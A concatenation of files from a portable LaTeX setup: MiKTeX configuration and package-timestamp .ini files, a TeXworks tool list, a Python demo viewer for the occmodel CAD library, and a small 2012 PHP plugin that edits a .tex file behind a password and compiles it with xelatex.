splitindex-Linux-i386 splitindex-OpenBSD-i386 \
$texmf/source/latex/splitindex
<file_sep>;;; DO NOT EDIT THIS FILE!
[ft.dvipsconfig]
path=.
path;=%R/dvips//
[ft.enc]
path=.
path;=%R/fonts/enc//
;; <legacy>
path;=%R/dvips//
;; </legacy>
[ft.map]
path=.
path;=%R/fonts/map//
;; <legacy>
path;=%R/dvips//
;; </legacy>
[ft.PostScript header]
path=.
path;=%R/dvips//
path;=%R/fonts/afm//
path;=%R/fonts/enc//
path;=%R/fonts/map//
path;=%R/fonts/type1//
path;=$(psfontdirs)
;;;
@4fd007fcdbb496fc6764fbdfd1b2e60c
<file_sep>Your Simple Groupware
===============
http://www.simple-groupware.de/cms/<file_sep>#!c:\Python33\python.exe
# -*- coding: utf-8 -*-
import math
import geotools as geo
import gltools as gl
import occmodel as occ
from occmodelviewer import Viewer
class Demo:
@classmethod
def eval(self):
loc = {
'pi':math.pi,
'Vertex':occ.Vertex,
'Edge':occ.Edge,
'Wire':occ.Wire,
'Face':occ.Face,
'Solid':occ.Solid,
'SWEEP_RIGHT_CORNER': occ.SWEEP_RIGHT_CORNER,
}
exec(self.TEXT) in loc
return self.results(loc)
class Edge_1(Demo):
NAME = "Primitives"
TEXT = \
"""
e1 = Edge().createLine(start = (0.,0.,0.), end = (1.,1.,0.))
e2 = Edge().createCircle(center = (0.,.5,0.), normal = (0.,0.,1.), radius = .5)
e3 = Edge().createArc(start = (-.5,0.,0.), end = (.5,1.,0.), center = (.5,0.,0.))
e4 = Edge().createArc3P(start = (1.,0.,0.), end = (-1.,0.,0.), pnt = (0.,1.,0.))
e5 = Edge().createEllipse(center=(0.,0.,0.),normal=(0.,0.,1.), rMajor = .5, rMinor=.2)
e6 = Edge().createHelix(pitch = .5, height = 1., radius = .25, angle = pi/5.)
pnts = ((0.,0.,0.), (0.,1.,0.), (1.,.5,0.), (1.,0.,0.))
e7 = Edge().createBezier(points = pnts)
pnts = ((0.,0.,0.), (0.,.5,0.), (1.,.25,0.),(1.,0.,0.))
e8 = Edge().createSpline(points = pnts)
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,2.
for name in ('e1','e2','e3','e4'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
x,y = 0.,0.
for name in ('e5','e6','e7','e8'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Wire_1(Demo):
NAME = "Primitives"
TEXT = \
"""
w1 = Wire().createRectangle(width = 1., height = 0.75, radius = 0.)
w2 = Wire().createRectangle(width = 1., height = 0.75, radius = .25)
w3 = Wire().createPolygon((
(-.5,-.5,0.),
(.5,-.5,0.),
(0.,.5,0.)),
close = True,
)
w4 = Wire().createRegularPolygon(radius = .5, sides = 6.)
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,0.
for name in ('w1','w2','w3','w4'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Wire_2(Demo):
NAME = "Operations"
TEXT = \
"""
# offset wire
w1 = Wire().createRectangle(width = 1., height = 0.75, radius = 0.)
w2 = Wire().createRectangle(width = 1., height = 0.75, radius = 0.)
w2.offset(0.1)
# fillet all edges
w3 = Wire().createRegularPolygon(radius = .5, sides = 6.)
w3.fillet(0.2)
# chamfer all edges
w4 = Wire().createRectangle(width = 1., height = 0.75, radius = 0.)
w4.chamfer(0.15)
# wire boolean cut operation
w5 = Wire().createRectangle(width = 1., height = 1., radius = 0.)
e1 = Edge().createCircle(center=(-.5,-.5,0.),normal=(0.,0.,1.),radius = .35)
e2 = Edge().createEllipse(center=(.5,.5,0.),normal=(0.,0.,1.), rMajor = .75, rMinor=.35)
w5.cut((e1,e2))
# wire boolean common operation
w6 = Wire().createRectangle(width = 1., height = 1., radius = 0.)
e2 = Edge().createEllipse(center=(-.5,-.5,0.),normal=(0.,0.,1.), rMajor = .75, rMinor=.35)
e2.rotate(-pi/.6, (0.,0.,1.), (-.5,-.5,0.))
w6.common(e2)
"""
@classmethod
def results(self, loc):
ret = [loc['w1'], loc['w2']]
x,y = 1.5,0.
for name in ('w3','w4','w5', 'w6'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Face_1(Demo):
NAME = "Create 1"
TEXT = \
"""
# create planar face from outer wire and edges/wires defining hole
w1 = Wire().createRectangle(width = 1., height = 1., radius = 0.)
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .25)
f1 = Face().createFace((w1, e1))
# create a face constrained by circle and points
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .5)
f2 = Face().createConstrained(e2, ((0.,.0,.25),))
# create planar polygonal face from series of points
pnts = ((-.5,-.5,0.), (0.,.5,0.), (1.,.5,0.), (.5,-.5,0.))
f3 = Face().createPolygonal(pnts)
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,0.
for name in ('f1','f2','f3'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Face_2(Demo):
NAME = "Create 2"
TEXT = \
"""
# create face by extruding edge/wire
e1 = Edge().createArc(start = (-.5,-.25,0.), end = (.5,.75,0.),
center = (.5,-.25,0.))
f1 = Face().extrude(e1, (0.,0.,0.), (0.,0.,1.))
# create face by revolving edge
pnts = ((0.,0.,0.), (0.,1.,0.), (1.,.5,0.), (1.,0.,0.))
e2 = Edge().createBezier(points = pnts)
f2 = Face().revolve(e2, (0.,-1.,0.), (1.,-1.,0.), pi/2.)
# create face by sweeping edge along spine
e3 = Edge().createArc((0.,0.,0.), (1.,0.,1.), (1.,0.,0.))
e4 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .25)
f3 = Face().sweep(e3, e4)
# create face by lofting through edges
e5 = Edge().createArc((0.,0.,0.),(1.,0.,1.),(1.,0.,0.))
e6 = Edge().createArc((0.,1.,0.),(2.,1.,2.),(2.,1.,0.))
f4 = Face().loft((e5,e6))
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,0.
for name in ('f1','f2','f3','f4'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Face_3(Demo):
NAME = "Create 3"
TEXT = \
"""
# cut face by edge
e1 = Edge().createArc(start = (-.5,-.25,0.), end = (.5,.75,0.), center = (.5,-.25,0.))
f1 = Face().extrude(e1, (0.,0.,0.), (0.,0.,1.))
e2 = Edge().createCircle(center=(.5,.5,0.),normal=(0.,1.,0.),radius = .75)
f1.cut(e2)
# find common face between circulare face and ellipse
e3 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .5)
f2 = Face().createFace(e3)
e4 = Edge().createEllipse(center=(0.,0.,0.),normal=(0.,0.,1.), rMajor = .75, rMinor=.3)
f2.common(e4)
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,0.
for name in ('f1','f2'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Solid_1(Demo):
NAME = "Primitives"
TEXT = \
"""
# solid sphere from center and radius
s1 = Solid().createSphere((0.,0.,0.),.5)
# solid cylinder from two points and radius
s2 = Solid().createCylinder((0.,0.,0.),(0.,0.,1.), .25)
# solid torus from two points defining axis, ring radius and radius.
s3 = Solid().createTorus((0.,0.,0.),(0.,0.,.1), .5, .1)
# solid cone from two points defining axis and upper and lower radius
s4 = Solid().createCone((0.,0.,0.),(0.,0.,1.), .2, .5)
# solid box from two points defining diagonal of box
s5 = Solid().createBox((-.5,-.5,-.5),(.5,.5,.5))
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,0.
for name in ('s1','s2','s3','s4','s5'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Solid_2(Demo):
NAME = "Create 1"
TEXT = \
"""
# create solid by extruding face
e1 = Edge().createLine((-.5,0.,0.),(.5,0.,0.))
e2 = Edge().createArc3P((.5,0.,0.),(-.5,0.,0.),(0.,.5,0.))
w1 = Wire().createWire((e1,e2))
f1 = Face().createFace(w1)
s1 = Solid().extrude(f1, (0.,0.,0.), (0.,0.,1.))
# create solid by revolving face
e2 = Edge().createEllipse(center=(0.,0.,0.),normal=(0.,0.,1.), rMajor = .5, rMinor=.2)
f2 = Face().createFace(e2)
s2 = Solid().revolve(f2, (1.,0.,0.), (1.,1.,0.), pi/2.)
# create solid by sweeping wire along wire path
w1 = Wire().createPolygon((
(0.,0.,0.),
(0.,0.,1.),
(.75,0.,1.),
(.75,0.,0.)),
close = False
)
e3 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .2)
s3 = Solid().sweep(w1, e3, cornerMode = SWEEP_RIGHT_CORNER)
# create solid by lofting through edges, wires and optional start/end vertex.
e4 = Edge().createCircle(center=(.25,0.,0.),normal=(0.,0.,1.),radius = .25)
e5 = Edge().createCircle(center=(.25,0.,.5),normal=(0.,0.,1.),radius = .5)
v1 = Vertex(.25,0.,1.)
s4 = Solid().loft((e4,e5,v1))
# create solid by sweeping face along path
e6 = Edge().createHelix(.4, 1., .4)
e7 = Edge().createCircle(center=(.5,0.,0.),normal=(0.,1.,0.),radius = 0.1)
f3 = Face().createFace(e7)
s5 = Solid().pipe(f3, e6)
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,0.
for name in ('s1','s2','s3','s4','s5'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Solid_3(Demo):
NAME = "Create 2"
TEXT = \
"""
# fuse solids
s1 = Solid().createBox((0.,0.,0.),(.5,.5,.5))
s2 = Solid().createBox((.25,.25,.25),(.75,.75,.75))
s1.fuse(s2)
# modifying solid by cutting against edge,wire,face or solid.
# Edge and wire always cut through, but Face only cuts in the
# direction of the normal.
s2 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
e1 = Edge().createCircle(center=(0.5,0.5,1.),normal=(0.,0.,1.),radius = 0.1)
e2 = Edge().createCircle(center=(.5,0.,.5),normal=(0.,0.,1.),radius = 0.25)
f1 = Face().createFace(e2)
s3 = Solid().createSphere((1.,1.,1.),.35)
s2.cut((e1,f1,s3))
# find common shape
s4 = Solid().createSphere((.5,.5,0.),.75)
s5 = Solid().createCylinder((.5,.5,-1),(0.,.5,1.), .5)
s4.common(s5)
# fillet edges
s6 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
s6.fillet(.2)
# chamfer edges
s7 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
s7.chamfer(.2)
# shell operation
s8 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
s8.shell(-.1)
# offset face to create solid
e3 = Edge().createArc((0.,0.,0.),(.5,0.,.5),(.5,0.,0.))
e4= Edge().createArc((0.,.5,0.),(1.,.5,1.),(1.,.5,0.))
f2 = Face().loft((e3,e4))
s9 = Solid().offset(f2, 0.2)
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,0.
for name in ('s1','s2','s4','s6','s7','s8','s9'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class Solid_4(Demo):
NAME = "Create 3"
TEXT = \
"""
# create solid by sewing together faces
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,-1.),radius = .5)
f1 = Face().createConstrained(e1, ((0.,.0,-.5),))
e2 = Edge().createCircle(center=(0.,0.,1.),normal=(0.,0.,1.),radius = .5)
f2 = Face().createConstrained(e2, ((0.,.0,1.5),))
f3 = Face().loft((e1,e2))
s1 = Solid().createSolid((f1,f3,f2))
# create solid from TrueType font
s2 = Solid().createText(1., .25, 'Tenko')
"""
@classmethod
def results(self, loc):
ret = []
x,y = 0.,0.
for name in ('s1','s2'):
e = loc[name]
e.translate((x,y,0))
ret.append(e)
x += 1.5
return ret
class DemoViewer(Viewer):
def __init__(self, fullscreen = False):
title = "Demo (F1 for help - 'm' to toggle menu)"
Viewer.__init__(self, -1, -1, title, fullscreen)
self.uiView = False
self.uiDemo = True
self.showUI = True
self.source = ''
self.defaultColor = gl.ColorRGBA(100,100,100,255)
self.edgeColor = gl.ColorRGBA(255,255,255,255)
def activeUI(self, x, y):
w, h = self.width, self.height
y = h - y
if not self.showUI:
return False
if self.ui.anyActive() or self.uiHelp:
return True
if x >= 10 and x <= 200:
if y >= .4*h and y <= h - 10:
return True
if self.source and x >= .5*w and x < w - 10:
if y >= 10 and y <= 160:
return True
return False
def onUI(self):
if self.uiQuit:
return self.onUIQuit()
if self.uiHelp:
return self.onUIHelp()
ui = self.ui
update = False
w, h = self.width, self.height
x, y = self.lastPos
scroll = self.uiScroll
if scroll != 0:
self.uiScroll = 0
if not self.showUI:
# empty gui
ui.beginFrame(x,h - y,self.currentButton,scroll)
ui.endFrame()
return update
ui.beginFrame(x,h - y,self.currentButton,scroll)
ui.beginScrollArea("Menu", 10, .4*h, 200, .6*h - 10)
ui.separatorLine()
if ui.collapse("View settings", "", self.uiView, True):
self.uiView = not self.uiView
if self.uiView:
ui.indent()
ui.label("View presets")
ui.indent()
if ui.item('Top', True):
self.onTopView()
update = True
if ui.item('Bottom', True):
self.onBottomView()
update = True
if ui.item('Front', True):
self.onFrontView()
update = True
if ui.item('Back', True):
self.onBackView()
update = True
if ui.item('Left', True):
self.onLeftView()
update = True
if ui.item('Right', True):
self.onRightView()
update = True
if ui.item('Iso', True):
self.onIsoView()
update = True
ui.unindent()
if ui.check('Gradient background', self.uiGradient, True):
self.uiGradient = not self.uiGradient
update = True
if ui.check('Specular material', self.uiSpecular, True):
self.uiSpecular = not self.uiSpecular
update = True
if ui.check('Draw face edges', self.uiEdges, True):
self.uiEdges = not self.uiEdges
update = True
if ui.button('Take screenshot', True):
self.onScreenShot(prefix = 'demoShot')
ui.unindent()
ui.separatorLine()
if ui.collapse("Demos", "", self.uiDemo, True):
self.uiDemo = not self.uiDemo
if self.uiDemo:
ui.indent()
ui.label("Edges")
ui.indent()
if ui.item(Edge_1.NAME, True):
self.onSetDemo(Edge_1)
update = True
ui.unindent()
ui.label("Wires")
ui.indent()
if ui.item(Wire_1.NAME, True):
self.onSetDemo(Wire_1)
update = True
if ui.item(Wire_2.NAME, True):
self.onSetDemo(Wire_2)
update = True
ui.unindent()
ui.label("Faces")
ui.indent()
if ui.item(Face_1.NAME, True):
self.onSetDemo(Face_1)
update = True
if ui.item(Face_2.NAME, True):
self.onSetDemo(Face_2)
update = True
if ui.item(Face_3.NAME, True):
self.onSetDemo(Face_3)
update = True
ui.unindent()
ui.label("Solids")
ui.indent()
if ui.item(Solid_1.NAME, True):
self.onSetDemo(Solid_1)
update = True
if ui.item(Solid_2.NAME, True):
self.onSetDemo(Solid_2)
update = True
if ui.item(Solid_3.NAME, True):
self.onSetDemo(Solid_3)
update = True
if ui.item(Solid_4.NAME, True):
self.onSetDemo(Solid_4)
update = True
ui.indent()
ui.endScrollArea()
if self.source:
ui.beginScrollArea("Source", .5*w, 10, .5*w - 10, 150.)
for line in self.source.splitlines():
if not line.strip():
ui.separator()
continue
ui.label(line)
ui.endScrollArea()
ui.endFrame()
return update
def onSetDemo(self, demo):
self.source = demo.TEXT.strip()
self.bbox.invalidate()
self.clear()
for obj in demo.eval():
self.add(obj)
self.onIsoView()
def onChar(self, ch):
if ch == 'm':
self.showUI = not self.showUI
self.onRefresh()
Viewer.onChar(self, ch)
def main():
mw = DemoViewer()
mw.onIsoView()
mw.mainLoop()
if __name__ == '__main__':
main()
<file_sep>;;; DO NOT EDIT THIS FILE!
buf_size=4000000
extra_mem_bot=2000000
extra_mem_top=4000000
font_max=5000
font_mem_size=2000000
hash_extra=100000
hyph_size=8191
main_memory=2000000
max_print_line=255
max_strings=262000
nest_size=500
param_size=10000
pool_free=47500
pool_size=2000000
save_size=50000
stack_size=10000
string_vacancies=125000
trie_size=500000
[pdftex]
pdf_mem_size=500000
obj_tab_size=300000
dest_names_size=130000
[ft.tex]
path=.
path;=%R/tex/context//
path;=%R/tex/plain//
path;=%R/tex/generic//
path;=%R/tex//
<file_sep>;;; DO NOT EDIT THIS FILE!
!include dvipdfm-common.ini
;;;
@c22a0accd4315b1e863c9fbe7a0bc8ec
<file_sep>;;; DO NOT EDIT THIS FILE!
[MPM]
AutoInstall=1
ProxyAuthReq=f
ProxyHost=
RemoteRepository=ftp://ftp.ccu.edu.tw/pub/tex/systems/win32/miktex/tm/packages/
RepositoryType=remote
ProxyPort=8080
UseProxy=f
[Update]
alwaysWelcome=f
<file_sep>;;; DO NOT EDIT THIS FILE!
[tex4ht]
TEX4HTFONTSET=alias,iso8859
TEX4HTINPUTS=.
TEX4HTINPUTS;=%R/tex4ht/base//
TEX4HTINPUTS;=%R/tex4ht/ht-fonts/alias//
TEX4HTINPUTS;=%R/tex4ht/ht-fonts/iso8859//
;;;
@027e28f510421a67b33b8d2b3e458362
<file_sep>;;; DO NOT EDIT THIS FILE!
[ft.tex]
extensions=
extensions;=.tex
extensions;=.mex
path=.
path;=%R/tex/mex//
path;=%R/tex/plain//
path;=%R/tex/generic//
path;=%R/tex//
;;;
@1d928c42deba82bd4e09920ed426fae8
<file_sep>[001]
name=LaTeXify
program=latexify.bat
arguments=$basename
showPdf=true
[002]
name=pdfLaTeX
program=pdflatex.exe
arguments="-synctex=1", $fullname
showPdf=true
[003]
name=XeLaTeX
program=xelatex.exe
arguments="-synctex=1", $fullname
showPdf=true
[004]
name=ConTeXt
program=texmfstart.exe
arguments=texexec, $fullname
showPdf=true
[005]
name=XeConTeXt
program=texmfstart.exe
arguments=texexec, --xtx, $fullname
showPdf=true
[006]
name=BibTeX
program=bibtex.exe
arguments=$basename
showPdf=false
[007]
name=MakeIndex
program=makeindex.exe
arguments=$basename
showPdf=false
<file_sep><?php
// 2012.06.02
// latexeditor plugin
// 新增功能: 假如所希望編輯的 plugin 尚未建立, 則此編輯程式將自行建立 plugin 目錄與檔案
$editor_pass = $cf['myeditor']['pass'];
session_start();
// 這裡的輸入 $texfile 為類似 simple.tex 中的 simple, 然後由系統自動加上 .tex 的 LaTex 檔案
function latexeditorMain($texfile)
{
global $menu;
$menu=$_GET["menu"];
$file=$_GET["file"];
// 若 downloads 目錄下根本就沒有 $texfile, 則自行建立空的 $texfile
// 若 $texfile 為空, 則回覆錯誤訊息
if ($texfile == "")
{
$output = "Error! Please contact the system administrator!";
return $output;
}
if (file_exists("downloads/".$texfile.".tex")) {
// 繼續執行
} else {
// 假如沒有所要編輯的 LaTex 檔案, 則由 template.tex 複製一份
if (!copy("downloads/template.tex", "downloads/".$texfile.".tex"))
{
$output = "can not create ".$texfile.".tex file";
return $output;
}
// 建立空 LaTex 檔案
//$ourFileHandle = fopen("./downloads/".$texfile, 'w') or die("can not create ".$texfile." file");
//fclose($ourFileHandle);
}
$output="正在編輯 ".$texfile.".tex latex 文件<br /><br />";
switch($menu)
{
case "latexeditorform":
if($_SESSION["latexeditortoken"])
$output.=latexeditorForm($texfile);
else
$output=latexeditorLogin();
break;
case "latexeditorsave":
if($_SESSION["latexeditortoken"])
$output.=latexeditorSave($texfile);
else
$output=latexlogin2();
break;
case "latexeditorcheck":
$output=latexeditorCheck($texfile);
break;
case "latexeditorlogout":
$output=latexeditorLogout();
break;
default:
$output=latexeditorLogin();
}
return $output;
}
function latexeditorLogin()
{
global $sn,$su;
$output= "請輸入登入密碼";
$output.="<form method=POST action=".$sn."?".$su."&menu=latexeditorcheck><br>";
$output.="密碼:<input type=password name=editorpass>";
$output.="<input type=submit value=send>";
$output.="</form>";
return $output;
}
function latexeditorLogout()
{
session_destroy();
$output="已經登出<br>";
$output.=latexeditorLogin();
return $output;
}
function latexeditorCheck($texfile)
{
global $editor_pass;
$password = $_POST["editorpass"];
$output = $password;
if($password==$editor_pass)
{
$_SESSION["latexeditortoken"]=true;
$output=latexeditorPrintmenu($texfile);
}
else
{
$_SESSION["latexeditortoken"]=false;
$output=latexeditorLogin();
}
return $output;
}
function latexeditorPrintmenu($texfile)
{
global $sn,$su;
$output.="<br /><a href=".$sn."?".$su."&menu=latexeditorform>編輯 ".$texfile.".tex 檔案</a>|";
$output.="<a href=".$sn."?".$su."&menu=latexeditorlogout>logout</a>|<br /><br />";
return $output;
}
function latexeditorForm($texfile)
{
global $sn,$su;
$output="<form method=post action=".$sn."?".$su."&menu=latexeditorsave>";
//$output.=dirname(__FILE__);
$fp = fopen ("downloads/".$texfile.".tex", "r");
$contents = fread($fp, filesize("downloads/".$texfile.".tex"));
fclose($fp);
$output.="<textarea cols=50 rows=20 name=\"content\">";
//這裡為了在html區域展示程式碼,若要轉回來,則使用htmlspecialchars_decode()
$output.=htmlspecialchars($contents);
$output.="</textarea>";
$output.="<br><input type=submit value=send>";
$output.="</form><br /><br />";
$output.=latexeditorPrintmenu($texfile);
return $output;
}
function latexeditorSave($texfile)
{
global $sn,$su;
if(ini_get('magic_quotes_gpc')=="1")
{
$content = stripslashes(htmlspecialchars_decode($_POST["content"]));
}
else
{
$content = htmlspecialchars_decode($_POST["content"]);
}
$fp = fopen ("downloads/".$texfile.".tex", "w");
fwrite($fp,$content);
fclose($fp);
$output .= date("H:i:s").":已經存檔,請在以下編輯區,繼續編輯<br />";
// 進行 latex 檔案編譯流程
exec("V:/portable_latex/MiKTeX/texmf/miktex/bin/xelatex.exe -no-pdf -interaction=nonstopmode -output-directory=downloads/ downloads/".$texfile.".tex");
// 利用相對目錄執行 C GD 繪圖程式
exec("V:/portable_latex/MiKTeX/texmf/miktex/bin/xdvipdfmx.exe -vv -E -o downloads/".$texfile.".pdf downloads/".$texfile.".xdv");
// 建立 pdf 連結, 以及 log 連結
$output .= "<br /><a href=\"?download=".$texfile.".pdf\">".$texfile.".pdf</a> | ";
$output .= "<a href=\"?download=".$texfile.".log\">".$texfile.".log</a><br /><br />";
// 以下回到編輯區
$output.="<form method=post action=".$sn."?".$su."&menu=latexeditorsave>";
//$output.=dirname(__FILE__);
$fp = fopen ("downloads/".$texfile.".tex", "r");
$contents = fread($fp, filesize("downloads/".$texfile.".tex"));
fclose($fp);
$output.="<textarea cols=50 rows=20 name=\"content\">";
//這裡為了在html區域展示程式碼,若要轉回來,則使用htmlspecialchars_decode()
$output.=htmlspecialchars($contents);
$output.="</textarea>";
$output.="<br><input type=submit value=send>";
$output.="</form>";
$output.=latexeditorPrintmenu($texfile);
return $output;
}<file_sep>;;; DO NOT EDIT THIS FILE!
[nomencl]
TimeInstalled=1264143811
[miktex-arctrl-bin-2.8]
TimeInstalled=1256205817
[sauerj]
TimeInstalled=1313545847
[jknappen]
TimeInstalled=1256205803
[ncntrsbk]
TimeInstalled=1256205838
[miktex-omega-bin-2.8]
TimeInstalled=1256205829
[miktex-mkfntmap-bin-2.8]
TimeInstalled=1256205829
[setspace]
TimeInstalled=1264143837
[hyphenat]
TimeInstalled=1313545884
[spie]
TimeInstalled=1264143838
[miktex-freetype-bin-2.8]
TimeInstalled=1256205824
[miktex-runtime-bin-2.8]
TimeInstalled=1256205834
[miktex-tex4ht-bin-2.8]
TimeInstalled=1256205834
[covington]
TimeInstalled=1264143757
[miktex-findtexmf-bin-2.8]
TimeInstalled=1256205824
[miktex-hyph-usenglish]
TimeInstalled=1256205826
[miktex-dvips-doc]
TimeInstalled=1256205824
[courier]
TimeInstalled=1256205797
[psnfss]
TimeInstalled=1256205843
[achemso]
TimeInstalled=1264143742
[miktex-tex-misc]
TimeInstalled=1256205834
[carlisle]
TimeInstalled=1256205796
[miktex-poppler-bin-2.8]
TimeInstalled=1256205833
[miktex-texinfo-bin-2.8]
TimeInstalled=1256205834
[miktex-metafont-bin-2.8]
TimeInstalled=1256205827
[mdwtools]
TimeInstalled=1347002196
[caption]
TimeInstalled=1313545706
[filecontents]
TimeInstalled=1313545752
[plgraph]
TimeInstalled=1264143824
[miktex-doc-2.8]
TimeInstalled=1264143483
[moderncv]
TimeInstalled=1264143808
[miktex-bibtex8bit-bin-2.8]
TimeInstalled=1256205818
[listings]
TimeInstalled=1264143792
[apa]
TimeInstalled=1264143743
[miktex-yap-bin-2.8]
TimeInstalled=1256205838
[miktex-psutils-bin-2.8]
TimeInstalled=1256205833
[miktex-qt4-bin]
TimeInstalled=1264143504
[soul]
TimeInstalled=1264143838
[miktex-hunspell-bin-2.8]
TimeInstalled=1256205826
[lettrine]
TimeInstalled=1313545888
[miktex-fontname-base]
TimeInstalled=1256205824
[miktex-dvicopy-bin-2.8]
TimeInstalled=1256205823
[rotating]
TimeInstalled=1264143835
[media9]
TimeInstalled=1338965873
[elsevier]
TimeInstalled=1264143762
[miktex-ghostscript-bin]
TimeInstalled=1256205826
[jurabib]
TimeInstalled=1264143774
[adjustbox]
TimeInstalled=1338907347
[frletter]
TimeInstalled=1313545771
[breakurl]
TimeInstalled=1313545880
[ccfonts]
TimeInstalled=1264143756
[cjk]
TimeInstalled=1313655570
[apacite]
TimeInstalled=1264143745
[miktex-bibtex-bin-2.8]
TimeInstalled=1256205818
[xargs]
TimeInstalled=1264143877
[miktex-makeindex-base]
TimeInstalled=1256205827
[miktex-pdftex-bin-2.8]
TimeInstalled=1256205829
[xstring]
TimeInstalled=1338907342
[miktex-dvipng-bin-2.8]
TimeInstalled=1256205823
[ntgclass]
TimeInstalled=1315140148
[symbol]
TimeInstalled=1315522713
[eco]
TimeInstalled=1264143760
[extsizes]
TimeInstalled=1264143764
[amsfonts]
TimeInstalled=1256205794
[miktex-etex-base]
TimeInstalled=1256205824
[miktex-ps2pk-bin-2.8]
TimeInstalled=1256205833
[unicode]
TimeInstalled=1313545766
Obsolete=1
[harvard]
TimeInstalled=1313545670
[ifplatform]
TimeInstalled=1315235093
[ifoddpage]
TimeInstalled=1338907357
[europecv]
TimeInstalled=1264143764
[croatian]
TimeInstalled=1313656054
[refstyle]
TimeInstalled=1313545909
[placeins]
TimeInstalled=1313545855
[exercise]
TimeInstalled=1346888204
[textcase]
TimeInstalled=1313545859
[miktex-config-2.8]
TimeInstalled=1256205818
[miktex-dict-english]
TimeInstalled=1256205819
[tufte-latex]
TimeInstalled=1264143873
[mathpazo]
TimeInstalled=1346888667
[l3packages]
TimeInstalled=1338906974
[euenc]
TimeInstalled=1256205799
[ifxetex]
TimeInstalled=1256205803
[amslatex]
TimeInstalled=1256205794
[miktex-misc]
TimeInstalled=1264143484
[miktex-mthelp-bin-2.8]
TimeInstalled=1256205829
[xkeyval]
TimeInstalled=1256205847
[thumbpdf]
TimeInstalled=1256205845
[dehyph-exptl]
TimeInstalled=1256205797
[paper]
TimeInstalled=1264143811
[miktex-mo-bin-2.8]
TimeInstalled=1256205829
[ifsym]
TimeInstalled=1264143772
[miktex-latex-config]
TimeInstalled=1256205827
[miktex-dvips-base]
TimeInstalled=1256205824
[metalogo]
TimeInstalled=1315053281
[miktex-dvipdfm-base-2.7]
TimeInstalled=1256205823
[aastex]
TimeInstalled=1264143740
[dtk]
TimeInstalled=1264143759
[miktex-dvips-bin-2.8]
TimeInstalled=1256205824
[ieeetran]
TimeInstalled=1264143772
[pdfpages]
TimeInstalled=1264143812
[ctex]
TimeInstalled=1264143759
[lineno]
TimeInstalled=1313545719
[koma-script]
TimeInstalled=1264143790
[miktex-bibtex-base]
TimeInstalled=1256205818
[arabi]
TimeInstalled=1313545876
[cmbright]
TimeInstalled=1264143757
[miktex-dict-french]
TimeInstalled=1256205819
[miktex-gsf2pk-bin-2.8]
TimeInstalled=1256205826
[titlesec]
TimeInstalled=1313545863
[miktex-mktex-bin-2.8]
TimeInstalled=1256205829
[units]
TimeInstalled=1264143876
[zapfding]
TimeInstalled=1256205847
[miktex-metafont-base]
TimeInstalled=1256205827
[eurofont]
TimeInstalled=1313545812
[g-brief]
TimeInstalled=1264143767
[latex2e-help-texinfo]
TimeInstalled=1256205803
[kluwer]
TimeInstalled=1264143774
[utopia]
TimeInstalled=1256205846
[etoolbox]
TimeInstalled=1314706208
[appendix]
TimeInstalled=1346888489
[miktex-pdftex-doc-2.6]
TimeInstalled=1256205830
[hyph-utf8]
TimeInstalled=1256205803
[miktex-pdftex-base]
TimeInstalled=1256205829
[xifthen]
TimeInstalled=1313545868
[braille]
TimeInstalled=1264143756
[miktex-fontconfig-bin-2.8]
TimeInstalled=1256205824
[miktex-vc90-bin]
TimeInstalled=1256205838
[miktex-ghostscript-base]
TimeInstalled=1256205826
[xecjk]
TimeInstalled=1264144614
[bera]
TimeInstalled=1264143755
[genmisc]
TimeInstalled=1313545896
[mwcls]
TimeInstalled=1264143809
[miktex-mfware-bin-2.8]
TimeInstalled=1256205829
[miktex-metafont-misc]
TimeInstalled=1256205827
[powerdot]
TimeInstalled=1264143825
[multirow]
TimeInstalled=1256205838
[avantgar]
TimeInstalled=1256205794
[miktex-texworks-bin-2.8]
TimeInstalled=1264143509
[ccaption]
TimeInstalled=1360401460
[rotfloat]
TimeInstalled=1264143835
[mathtime]
TimeInstalled=1339110817
[translator]
TimeInstalled=1315522693
[xltxtra]
TimeInstalled=1264143714
[miktex-icu-bin]
TimeInstalled=1256205827
[miktex-cweb-bin-2.8]
TimeInstalled=1256205819
[catoptions]
TimeInstalled=1338907362
[enumitem]
TimeInstalled=1264143763
[eso-pic]
TimeInstalled=1360401447
[babel]
TimeInstalled=1256205795
[feyn]
TimeInstalled=1313545922
[bidi]
TimeInstalled=1264143366
[cjkpunct]
TimeInstalled=1264144536
[levy-font]
TimeInstalled=1346893827
[miktex-xetex-bin-2.8]
TimeInstalled=1256205838
[latex-fonts]
TimeInstalled=1256205803
[miktex-graphics-bin-2.8]
TimeInstalled=1256205826
[cleveref]
TimeInstalled=1313545713
[splitindex]
TimeInstalled=1313545913
[fancyvrb]
TimeInstalled=1313545818
[seminar]
TimeInstalled=1264143836
[beamer]
TimeInstalled=1264143753
[graphics]
TimeInstalled=1256205800
[menukeys]
TimeInstalled=1338907336
[preview]
